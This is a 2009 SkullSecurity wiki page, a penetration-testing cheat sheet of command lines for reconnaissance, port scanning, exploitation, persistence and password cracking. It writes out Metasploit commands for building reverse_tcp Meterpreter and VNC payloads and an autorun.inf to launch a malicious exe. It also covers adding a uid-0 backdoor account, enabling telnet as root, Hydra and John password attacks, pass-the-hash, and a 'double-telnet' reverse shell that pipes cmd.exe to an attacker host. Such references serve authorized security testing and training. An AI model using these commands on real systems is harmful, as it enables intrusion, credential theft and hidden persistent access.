Linux Commands

From SkullSecurity
Revision as of 20:33, 25 June 2009 by Blackfrog (talk | contribs) (→‎Recon: Added snmpwalk ARP table dump command)
Jump to navigation Jump to search
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.

Recon

whois

$ whois [-h whois_server] name

nslookup

$ nslookup <target>

dig

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
$ dig [@server] <name> [type]
  • Zone transfer
$ dig [@server] <domain> -t AXFR
  • Iterative zone transfer
$ dig [@server] <domain> -t IXFR=<N>

BiLE.pl

$ ./BiLE <target> <result_file>
$ ./BiLE-weigh.pl <site_of_interest> <BiLE_output.mine>
$ ./tld-expand.pl
$ ./vet-IPrange.pl
$ ./qtrace.pl

snmpwalk

Dump the ARP table of an snmp server at HOST 

$ snmpwalk -v 2c -c <community> <server> ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump

Scanning

tcpdump

Parameters

  • -n -- use numbers
  • -i <interface>
  • -v -- be verbose
  • -r <file>/-w <file> -- read from/write to file
  • -x -- print hex
  • -A -- print ASCII
  • -X -- print hex and ASCII
  • -s <snaplen> -- length to capture (-s0 for all data)

Filter string

  • Protocol
    • ether, ip, ip6, arp, rarp, tcp, udp
  • Type
    • host <host>
    • net <network>
    • port <portnum>
    • portrange <start-end>
  • Direction
    • src
    • dst
  • Logic
    • and
    • or
  • Show TCP against target 10.10.10.10 in ASCII
tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
  • Show all UDP from 10.10.10.10
tcpdump [-i tap0] -n udp and src 10.10.10.10
  • Show all TCP port 80 packets going to or from host 10.10.10.10
tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10

hping3

TCP Flags

  • --syn, --fin, --rst, --push, --ack, --urg

Target selection

  • --rand-dest
  • --interface <int>

Source selection

  • --spoof <hostname>
  • --rand-source

Port selection

  • --destport <port>
  • --destport +<port> -- increment by one for each packet received
  • --destport ++<port> -- increment by one for each packet sent
  • --scan <portrange>
  • --baseport <port>
  • --keep -- don't increment the source port

Speed options

  • --fast, --faster, --flood
  • --interval <N> -- interval in seconds
  • --interval u<N> -- interval in microseconds

Other options

  • --count <N>
  • --beep
  • --file <filename>
  • --data <N>

traceroute

Parameters

  • -f <N> -- Initial TTL
  • -g <hostlist> -- Loose source route
  • -I -- use ICMP Echo instead of UDP
  • -m <N> -- maximum number of hops (default 30)
  • -n -- numeric
  • -p <baseport> -- set the base UDP port
  • -w <N> -- wait N seconds (default 5)

Layer Four Traceroute (lft)

http://pwhois.org/lft/index.who

Options

  • -u -- use UDP
  • -p -- use ICMP echo
  • -d <port> -- destination port (default 80)
  • -s <port> -- source port
  • -L <N> -- length (including layer 3/4 header)
  • -A -- look up AS number
  • -P -- traceroute via tcp

nmap

Pinging

  • -PN -- don't ping
  • -PB -- default, ICMP Echo + TCP to port 80
  • -PE -- ICMP Echo request
  • -PS[portlist] -- TCP SYN
  • -PP -- ICMP Timestamp request
  • -PM -- ICMP Address Mask request
  • -PR -- default on subnet, use ARP to identify hosts

Scanning

  • -sT -- TCP Connect scan
  • -sS -- SYN scan
  • -sA -- ACK scan
  • -sF -- FIN scan
  • -sN -- Null scan
  • -sX -- Xmas Tree scan
  • -sM -- Maimon scan
  • --scanflags specify your own flags
  • -sU -- UDP scan

Fingerprinting

  • -O -- OS fingerprint
  • -sV -- Version scan

Scripts

  • -sC -- run all scripts
  • --script=<category,dir,src,etc&/gt;
  • --script-trace

Timing

  • --paranoid, --sneaky, --polite, --normal, --aggressive, --insane
  • --host_timeout, --max_rtt_timeout, --min-rtt-timeout, --initial_rtt_timeout, --max-parallelism, --scan_delay

Other options

  • -p<ports>
  • -F -- fast (checks only ports in nmap-services)
  • --packet-trace
  • --traceroute
  • --badsum

THC amap

Options

  • -q -- quiet (omit closed ports)
  • -v -- verbose
  • -b -- print banners

Example: 

amap -bqv 10.10.10.10 1-50

Enumerating users

Commands 

$ cat /etc/passwd
$ finger
$ who
$ w

Remotely: 

$ finger @<target>

Exploitation

netcat

Options

  • -l -- listen mode
  • -L -- listen harder (Windows only)
  • -u -- UDP mode
  • -p -- local port (in listen mode, the port to listen on)
  • -e -- program to execute
  • -n -- don't resolve names
  • -z -- don't send any data
  • -w<N> -- timeout for connects
  • -v/-vv -- be verbose

Scanning 

echo "" | nc -v -n -w1 <target> <port-range>

Setting up a relay 

mknod backpipe p
nc -l -p <allowed_port> < backpipe | nc <host> <port> > backpipe

Relaying port 22 to the local system 

mknod backpipe p
nc -l -p <allowed_port> < backpipe | nc localhost 22 > backpipe

Finding SetUID/SetGID programs

find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print

for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done

Metasploit

Running an exploit 

msf> show exploits
msf> use exploit/windows/smf/ms05_039_php
msf> show payloads
msf> set PAYLOAD windows/shell/bind_tcp
msf> show options
msf> set RHOST 10.10.10.10
msf> exploit

Interacting with sessions 

msf> sessions -l
msf> sessions -i <N>

Creating a malicious VBScript 

$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> V
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y V

Creating a malicious Exe 

$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> X
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y X

Example autorun.inf file to run a malicious exe (goes with Metasploit) 

[autorun]
open=example.exe
icon=example.exe

Metasploit listener 

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=<lhost> E
$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y E

Meterpreter

Filesystem commands 

> cd
> lcd 
> pwd / getwd
> ls
> cat
> download / upload
> mkdir / rmdir
> edit
> getpid
> getuid
> ps
> kill
> execute
> migrate
> ipconfig
> portfwd
> route
> idletime
> uictl <enable/disable> <keyboard/mouse>

Modules 

> use <modulename>
> use priv
> hashdump
> timestomp

Creating a user

Adding an ordinary user 

useradd <name>

Adding a root user (note: a non-uid-0 account may be required to log in) 

useradd -o -u 0 <name>

telnet

Checking for inetd/xinetd 

ps aux | grep inetd

Adding telnet to /etc/inetd 

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

Adding telnet to xinetd

  • Steal the file from a service that's running (files are in /etc/xinetd.d)
  • Change server to "/usr/sbin/in.telnetd"

Restarting inetd/xinetd (the "kill" command with the PID can also be used) 

killall -HUP inetd
killall -HUP xinetd

sshd

File should be in /etc/rc*. Ways to enable: 

chkconfig sshd on
service sshd start
/etc/init.d/sshd start

Passwords

Dictionaries

Creating a dictionary 

cat wordlist.txt | sort | uniq > dictionary.txt

Scraping a Web site 

mkdir /mnt/source
cd /tmp/source
wget -r -l <N> <target>
cd ..
grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst

Or, just use my dictionaries

Account lockout

grep tally /etc/pam.d/*
grep tally /etc/pam.conf

pw-inspector

Options

  • -i -- input file
  • -o -- output file
  • -m <N> -- minimum length
  • -M <N> -- maximum length
  • -c <N> -- the number of criteria
    • -l -- lower case
    • -u -- upper case
    • -n -- numbers
    • -p -- printable characters (lower/upper/num)
    • -s -- special characters (all others)

Example 

cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2

Hydra

Options

  • -l <username>/-L <userfile> -- Login name/file
  • -p <password>/-P <passfile> -- Password/file
  • -e <n|s|ns> -- extended checks (n = null, s = same as username)
  • -t <N> -- thread count
hydra <host> <protocol> <-l <username>|-L <userfile>> <-p <password>|-P <passfile>> [-e <n|s|ns>] [-t <threads>]

smb password 

hydra <host> smb -l george -P ./list.lst -e ns

ssh password 

hydra <host> ssh2 -l george -P ./list.lst -e ns

John

Show cracked passwords 

john --show <passwordfile>

Speed test 

john --test

Running against a password file 

john <passwordfile>

Specifying type type 

john --format=<format> <passwordfile>
john --format=nt /tmp/pwdump

Combining passwd/shadow 

unshadow <passwdfile> <shadowfile> > combined.txt
john combined.txt

Modified Samba

Loading the hash 

export SMBHASH="<LANMAN>:<NT>"
echo $SMBHASH

Mounting a drive 

./smbmount //<target>/<share> <mountpoint> -o username=<username>
./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator

Adding a user 

./net user ADD <username> <password> -I <target> -U <admin_username>
./net rpc group ADDMEM administrators <username> -I <target> -U <admin_username>

Web

nikto.pl

Scanning 

nikto.pl -h <host>

Updating 

nikto.pl -update

Single check 

nikto.pl -Single

Fancy tricks

Double-telnet

On the attacker machine 

nc -l -p 4444
nc -l -p 5555

On the victim machine 

telnet <attacker> 4444 | cmd.exe | telnet <attacker> 5555
Retrieved from "https://wiki.skullsecurity.org/index.php?title=Linux_Commands&oldid=2839"